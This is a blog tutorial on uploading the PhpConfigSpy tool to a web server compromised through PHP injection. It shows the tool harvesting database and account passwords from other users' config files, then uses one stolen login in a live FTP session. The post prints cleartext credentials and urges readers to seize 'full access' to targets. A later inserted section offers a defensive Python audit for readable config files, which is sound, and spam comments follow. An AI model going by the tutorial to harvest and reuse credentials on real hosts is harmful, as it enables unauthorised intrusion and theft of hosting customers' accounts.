PhpConfigSpy v0.2 – Scan and Grab Login
Posted by newbiekid, Apr 27
PhpConfigSpy is a tool for recovering account logins from a website, such as the cPanel login, the SSH login (if the web target supports SSH) and possibly the database login.
Most of us, after getting a web target (via PHP injection), use it only to run bots (Eggdrop, psyBNC). Why not try to get full access to the web target?
Let's try to get some login information from the web target with the PhpConfigSpy tool.
Upload PhpConfigSpy.txt to the web target, then rename the file from .txt to .php. That's all. You can test the tool with a browser (IE, Firefox, Opera, etc.), for example http://www.yourtarget.com/portal/images/phpconfigspy.php.
And this is the result of the scan:
[+] Founded 113 entrys in /etc/passwd
[+] Founded 113 readable public_html directories
[~] Searching for passwords in config.* files…
[+] /home/cofinca/public_html/portal/mambots/editors/fckeditor/editor/filemanager/connectors/php/config.php
ew database( $mosConfig_host, $mosConfig_user, $mosConfig_password, $mosConfig_db, $mosConfig_dbprefix, $mosConfig
[+] /home/bsidenet/public_html/configuration.php
bside123
[FTP] bsidenet:bside123 Success
[+] /home/gratis/public_html/configuration.php
deko93tg
[FTP] gratis:deko93tg Success
Bingo… that is a success!!!
You can check that username over FTP or SSH (if the target supports SSH).
Let's check this login together:
[FTP] bsidenet:bside123 Success
That means user: bsidenet and password: bside123
C:\Documents and Settings\0286061961>ftp alvoaxxxx.pt
Connected to alvoaxxxx.pt.
220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 04:02. Server port: 21.
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
User (alvoaxxxx.pt:(none)): bsidenet
331 User bsidenet OK. Password required
Password:
230-User bsidenet has group access to: bsidenet
230 OK. Current restricted directory is /
ftp> dir
200 PORT command successful
150 Connecting to port 41080
drwx--x--x 8 32137 bsidenet 4096 Mar 26 23:06 .
drwx--x--x 8 32137 bsidenet 4096 Mar 26 23:06 ..
-rw-r--r-- 1 32137 bsidenet 24 Mar 26 23:04 .bash_logout
-rw-r--r-- 1 32137 bsidenet 191 Mar 26 23:04 .bash_profile
-rw-r--r-- 1 32137 bsidenet 124 Mar 26 23:04 .bashrc
-rw-r--r-- 1 32137 bsidenet 19 Mar 26 23:04 .contactemail
drwx------ 2 32137 bsidenet 4096 Apr 23 00:22 .cpanel-datastore
-rw------- 1 32137 bsidenet 14 Apr 23 16:06 .lastlogin
drwxr-xr-x 2 32137 bsidenet 4096 Mar 26 23:04 etc
drwxr-x--- 5 32137 12 4096 Mar 26 23:04 mail
drwxr-xr-x 3 32137 bsidenet 4096 Feb 12 2007 public_ftp
drwxr-x--- 6 32137 99 4096 Apr 23 17:43 public_html
drwxr-xr-x 7 32137 bsidenet 4096 Mar 26 23:22 tmp
lrwxrwxrwx 1 32137 bsidenet 11 Mar 26 23:04 www -> public_html
226-Options: -a -l
226 14 matches total
ftp: 936 bytes received in 0.00Seconds 936000.00Kbytes/sec.
ftp>
It works, bro.
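
Seen from the hosting side, the scan output above depends on each account's config.* and configuration.php files being readable by an identity other than the owning account. The following audit is an added example, not part of the original post or of PhpConfigSpy; the <home>/<account>/public_html layout comes from the output above, while the account names and file contents are constructed.

```python
import fnmatch
import os
import stat
import tempfile

# Name patterns taken from the scan output above ("config.*" and configuration.php).
PATTERNS = ("config.*", "configuration.php")

def audit_webroots(home_root, webroot="public_html"):
    """List config files under <home_root>/<account>/<webroot> that anyone
    other than the owning account can read (group or other read bit set)."""
    findings = []
    for account in sorted(os.listdir(home_root)):
        base = os.path.join(home_root, account, webroot)
        if not os.path.isdir(base):
            continue
        for dirpath, dirs, files in os.walk(base):
            dirs.sort()  # deterministic traversal order
            for name in sorted(files):
                if not any(fnmatch.fnmatch(name, p) for p in PATTERNS):
                    continue
                path = os.path.join(dirpath, name)
                mode = stat.S_IMODE(os.lstat(path).st_mode)
                readers = [who for who, bit in (("group", stat.S_IRGRP),
                                                ("other", stat.S_IROTH)) if mode & bit]
                if readers:
                    findings.append((account, os.path.relpath(path, base),
                                     format(mode, "04o"), "+".join(readers)))
    return findings

def build_sample_tree(root):
    """Constructed sample accounts (hypothetical names), not data from the post."""
    samples = {
        "alice/public_html/configuration.php": 0o644,  # readable by everyone
        "bob/public_html/app/config.php": 0o600,       # owner only
        "carol/public_html/config.inc.php": 0o640,     # readable by group
        "bob/public_html/index.php": 0o644,            # not a config file
    }
    for rel, mode in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("<?php /* constructed placeholder */ ?>\n")
        os.chmod(path, mode)
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for row in audit_webroots(build_sample_tree(tmp)):
            print(*row)
```

A 0600 mode on these files only works when PHP runs as the owning account (for example per-user PHP-FPM pools or a suEXEC-style wrapper). The database password stored in such a file should also differ from the account's FTP or cPanel password.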

39 comments
Pingback by º TuToriaL CuamPuR AdUk SemBarAnG KaLiR º on May 19, 2009 at 10:50 am
[...] the user and password
) even though ssh shell is cannot started. You can scan the target using phpconfigspy to grab and get the login password. Let’s we started the lesson. I find the target and [...]
Comment by Kelly Brown on June 13, 2009 at 2:34 am
The best information I have found exactly here. Keep going. Thank you
Comment by JaneRadriges on June 14, 2009 at 7:53 am
The article is very good. Write more, please
Comment by KattyBlackyard on June 15, 2009 at 9:57 am
I really like your post. Is it copyright protected?
Comment by newbiekid on June 16, 2009 at 10:51 am
this is free tutorial my bro, you can repost it on your blog. But please make some information about my blog.
Thanks
Comment by KonstantinMiller on July 7, 2009 at 10:14 am
Hi. I like the way you write. Will you post some more articles?
Comment by newbiekid on July 17, 2009 at 11:59 pm
i will post what i know and of course for our experience
Comment by Bruivinia on December 7, 2009 at 12:47 pm
This is my first word
Hi
Comment by Yahoouj on February 23, 2010 at 8:50 pm
Really good work about this website was done. Keep trying more – thanks!
Comment by Daniel on December 18, 2010 at 4:20 am
great post, thanks for sharing
Comment by Jude Bisikirski on January 15, 2011 at 3:53 am
Very good stuff. Do you have an RSS feed? And would it be cool if I added your feed to a website of mine? I have a site that draws content through RSS feeds from a number of sites and I’d like to add yours, a lot of people do not mind considering I link back and everything but I like to get approval first. Anyhow let me know if you could, thank you. Regards, Jude Bisikirski.
Comment by student loans on January 21, 2011 at 3:08 am
My partner and I really enjoyed reading this blog post, I was just itching to know do you trade featured posts? I am always trying to find someone to make trades with and merely thought I would ask.
Comment by newbiekid on January 21, 2011 at 10:06 am
@Jude : my website didn’t create RSS, maybe next time i will create it. Thanks
Comment by propecia on January 23, 2011 at 9:39 am
You’re so cool! I don’t suppose I’ve learn anything like this before. So nice to find any individual with some unique ideas on this subject. Really thanks for starting this up. This web site is something that’s needed on the web, somebody with just a little originality. Helpful job for bringing something new to the web!
Comment by opthamologists on January 24, 2011 at 6:11 pm
Superb blog post, I have book marked this internet site so ideally I’ll see much more on this subject in the foreseeable future!
Comment by maria andros on January 25, 2011 at 6:41 pm
I really liked your blog! It helped me a lot…
Comment by Valium on January 26, 2011 at 4:50 am
Spot on with this write-up, I really assume this website wants way more consideration. I’ll probably be once more to read way more, thanks for that info.
Comment by beraLilabet on January 26, 2011 at 12:17 pm
what I was looking for, thank you
Comment by sleep aids on January 26, 2011 at 8:02 pm
You made some respectable factors there. I regarded on the web for the difficulty and found most people will go along with along with your website.
Comment by levitra on January 28, 2011 at 3:14 am
There may be noticeably a bundle to learn about this. I assume you made sure nice points in options also.
Comment by viagra on January 28, 2011 at 8:23 pm
There are some interesting deadlines on this article but I don’t know if I see all of them center to heart. There’s some validity however I’ll take maintain opinion until I look into it further. Good article , thanks and we would like extra! Added to FeedBurner as nicely
Comment by nail fungus treatment on January 29, 2011 at 8:05 am
I’d have to examine with you here. Which is not something I normally do! I enjoy reading a post that will make people think. Additionally, thanks for allowing me to comment!
Comment by Guenithen on January 30, 2011 at 11:44 pm
I had a good time here but will return to google now.
Comment by vigrx on January 31, 2011 at 6:43 pm
There are definitely a number of details like that to take into consideration. That is a great level to bring up. I provide the ideas above as general inspiration but clearly there are questions like the one you convey up where crucial factor might be working in trustworthy good faith. I don’t know if best practices have emerged round issues like that, however I’m sure that your job is clearly identified as a good game. Both girls and boys feel the affect of only a second’s pleasure, for the rest of their lives.
Comment by Cialis on February 2, 2011 at 6:43 am
This actually answered my drawback, thanks!
Comment by cialis on February 5, 2011 at 12:04 am
Thanks for providing really informative articles on your website. How can I bookmark it?
Comment by pacman on February 10, 2011 at 8:25 am
Good post. I be taught something more difficult on different blogs everyday. It’s going to all the time be stimulating to read content from other writers and practice a bit one thing from their store. I’d desire to use some with the content material on my weblog whether or not you don’t mind. Naturally I’ll provide you with a link in your web blog. Thanks for sharing.
Comment by jigsaw on February 10, 2011 at 9:20 am
very nice put up, i actually love this web site, carry on it
Comment by Free porn on February 10, 2011 at 12:54 pm
Aw, this was a really nice post. In concept I want to put in writing like this additionally – taking time and precise effort to make a very good article… however what can I say… I procrastinate a lot and not at all seem to get one thing done.
Comment by electronic cigarette on February 23, 2011 at 11:32 am
Aw, this was a really nice post. In concept I would like to put in writing like this moreover – taking time and precise effort to make an excellent article… however what can I say… I procrastinate a lot and in no way appear to get one thing done.
Comment by debt advice on March 5, 2011 at 11:00 pm
I had a smashing continuously reading on all sides your transmit as I announce it extensively. Excellent article! I am looking clockwise to hearing more from you
Comment by Vinnie Vandall on March 5, 2011 at 11:55 pm
Thank you for spending some time to look at this, I think strongly regarding it and love learning a lot more about this topic. If perhaps feasible, while you gain knowledge, could you mind adding to your website together with further advice? It is exceptionally interesting for my situation.
Comment by Free Macbook Pro on April 13, 2011 at 6:34 pm
That is very interesting, You’re a very skilled blogger. I’ve joined your rss feed and look forward to in the hunt for more of your magnificent post. Additionally, I’ve shared your web site in my social networks!
Comment by kursi sintetik rotan on April 14, 2011 at 8:46 am
I needed to write down a brief notice in buy to thanks for all the fantastic suggestions you might be placing at this website. My prolonged internet research has at the finish of the day been recognized with reliable details and techniques to trade with my co-workers. I would assert that a number of of us readers really are truly lucky to live in a useful location with quite a great deal of superb individuals with insightful pointers.